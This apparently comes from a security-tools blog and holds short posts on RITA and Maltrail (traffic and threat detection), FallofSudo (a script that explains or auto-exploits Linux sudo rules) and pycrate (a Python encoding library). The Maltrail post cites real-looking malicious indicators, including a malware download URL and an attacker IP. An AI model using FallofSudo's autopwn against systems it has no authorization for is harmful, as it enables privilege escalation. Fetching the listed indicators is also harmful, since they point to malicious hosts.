Posts

RITA v1.1.1: Real Intelligence Threat Analytics

Image
Real Intelligence Threat Analytics (RITA) is an open source framework for network traffic analysis. The framework ingestsBro Logs, and currently supports the following analysis features: Beaconing Detection: Search for signs of beaconing behaviour in and out of your networkDNS Tunneling Detection Search for signs of DNS based covert channelsBlacklist Checking: Query blacklists to search for suspicious domains and hostsURL Length Analysis: Search for lengthy URLs indicative of malwareScanning Detection: Search for signs of port scans in your networkChangelog v1.1.1 Changes: Make some commands periodically check for program updates #255Update Mongo version to 3.6 #248

maltrail v0.11.10 releases: Malicious traffic detection system

Image
Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user-defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in the discovery of unknown threats (e.g. new malware). Architecture Maltrail is based on the Traffic -> Sensor <-> Server <-> Client architecture. Sensor(s) is a standalone component running on the monitoring node (e.g. Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine …

FallofSudo: Pwning sudo rules

Image
FallofSudo This has been developed to aid in the exploitation of Linux sudo rules. However, it should also be used in learning how to secure your sudo rules! Download git clone https://github.com/Critical-Start/FallofSudo.git Usage This script has two functions: Informational: By passing the -i command argument the program will show you how to exploit the specific sudo rule you are facing. This is the safest and most preferred way to use this script.Autopwn: By passing the -a command argument the program will auto exploit the specific sudo rule you are facing. By careful using this argument and ensure you know what you are doing!Copyright (c) 2018 Critical Start Source: https://github.com/Critical-Start/

pycrate: Python library to ease the development of encoders and decoders

Image
Pycrate is a French word for qualifying bad wine. The present software library has nothing to do with bad wine, it is simply a Python library for manipulating various digital formats in an easy way. It is the glorious successor of libmich, which was started 8 years ago and served well.
Components Pycrate is actually more a software suite than a single library. It is composed of several subdirectories, each providing specific services. pycrate_core The core of the library. utils provides basics functions to manipulate integers, bytes and bitscharpy provides the Charpy class to handle easily the consumption of a bit-streamelt and base are providing several classes to help when building complex data structuresrepr provides simple functions to help with the representation of instances from the elt and base modules Some of the most useful features are provided by the pack_val() functions from the utils module and the Charpy class from the charpy module. They help to deal easily with packing …